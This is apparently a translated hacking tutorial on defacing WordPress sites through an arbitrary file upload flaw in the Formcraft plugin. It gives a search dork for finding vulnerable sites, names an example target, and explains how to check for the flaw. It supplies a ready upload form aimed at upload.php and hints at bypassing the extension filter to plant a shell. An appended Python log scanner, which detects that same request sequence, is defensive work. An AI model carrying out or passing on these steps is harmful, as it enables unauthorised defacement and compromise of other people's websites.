Deface WordPress Formcraft Arbitrary File Upload

In this tutorial, the admin will share how to deface using the WordPress Formcraft plugin.

Okay, let's get straight to the tutorial.


Dork: Index Of "/wp-content/plugins/formcraft/file-upload/server/" intext:content

Expand on it further to find untouched ones.

Exploit: upload.php

First, search with the dork above.

Just pick one of the results for now :)

Open your target, for example mine > http://mclvt.org/wp-content/plugins/formcraft/file-upload/server/content/

Once that's done, append the exploit upload.php, or just click it:

Vulnerable? You get the error: {"failed":"No file found 2"}


Then put your target into the CSRF form :) The CSRF form is further down!

Save the CSRF form under a name of the form namacsrf.html

Then open it in your own browser, don't borrow someone else's browser xD

Choose your txt file, haha; maybe those who are good at bypassing the extension check for a shell can manage it, lol.

Then click upload.

You're immediately given access to your file xD

Access: localhost//wp-content/plugins/formcraft/file-upload/server/content/files/angkarandom_namafile.txt (angkarandom = a random number, namafile = the name of your file)

Success ??? ☺

Okay, that's all for this tutorial from me :) Hope it's useful.

The CSRF form:

<form method="POST" action="http://localhost/wp-content/plugins/formcraft/file-upload/server/content/upload.php" enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
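
Seen from the server side, the steps above leave a recognisable trail in the access log: requests to the plugin's content/ directory and upload.php, a POST to upload.php, then a fetch under content/files/. The following is an added example, not part of the original post, that flags that sequence per client IP in combined-format log lines; the paths come from the post, while the sample log lines, IP addresses and file names are constructed.

```python
import re
from collections import defaultdict

# Paths come from the post; log lines, IPs and file names below are constructed.
BASE = "/wp-content/plugins/formcraft/file-upload/server/content/"
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                  r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# Extensions a server may execute if the upload filter is bypassed.
RISKY_EXT = re.compile(r'\.(php\d?|phtml|phar|pht)(\.|$)', re.I)

def normalise(path):
    """Drop the query string and collapse repeated slashes ('//wp-content')."""
    return re.sub(r'/{2,}', '/', path.split('?', 1)[0])

def scan(lines):
    """Group requests that touch the plugin's upload directory by client IP."""
    out = defaultdict(lambda: {"probes": 0, "uploads": 0, "blocked": 0,
                               "fetched": [], "risky": []})
    for line in lines:
        m = LINE.match(line)
        if not m or not normalise(m["path"]).startswith(BASE):
            continue
        rest = normalise(m["path"])[len(BASE):]
        ok, hit = m["status"].startswith("2"), out[m["ip"]]
        if m["method"] == "POST" and rest == "upload.php":
            hit["uploads" if ok else "blocked"] += 1
        elif rest in ("", "upload.php"):
            hit["probes"] += 1           # directory index or endpoint check
        elif rest.startswith("files/") and ok:
            name = rest[len("files/"):]
            hit["fetched"].append(name)  # uploaded file served back
            if RISKY_EXT.search(name):
                hit["risky"].append(name)
    return dict(out)

P = BASE  # shorthand for the constructed sample lines
SAMPLE_LOG = [
    f'203.0.113.7 - - [10/Oct/2016:13:55:01 +0000] "GET {P} HTTP/1.1" 200 512',
    f'203.0.113.7 - - [10/Oct/2016:13:55:09 +0000] "GET {P}upload.php HTTP/1.1" 200 31',
    f'203.0.113.7 - - [10/Oct/2016:13:56:40 +0000] "POST {P}upload.php HTTP/1.1" 200 96',
    f'203.0.113.7 - - [10/Oct/2016:13:56:52 +0000] "GET /{P}files/48213_note.txt HTTP/1.1" 200 14',
    f'198.51.100.20 - - [10/Oct/2016:14:02:11 +0000] "POST {P}upload.php HTTP/1.1" 403 199',
    '192.0.2.5 - - [10/Oct/2016:14:03:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, hit in scan(SAMPLE_LOG).items():
        print(ip, hit)
```

Pass any iterable of combined-format lines, for example an open access-log file, to `scan`.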
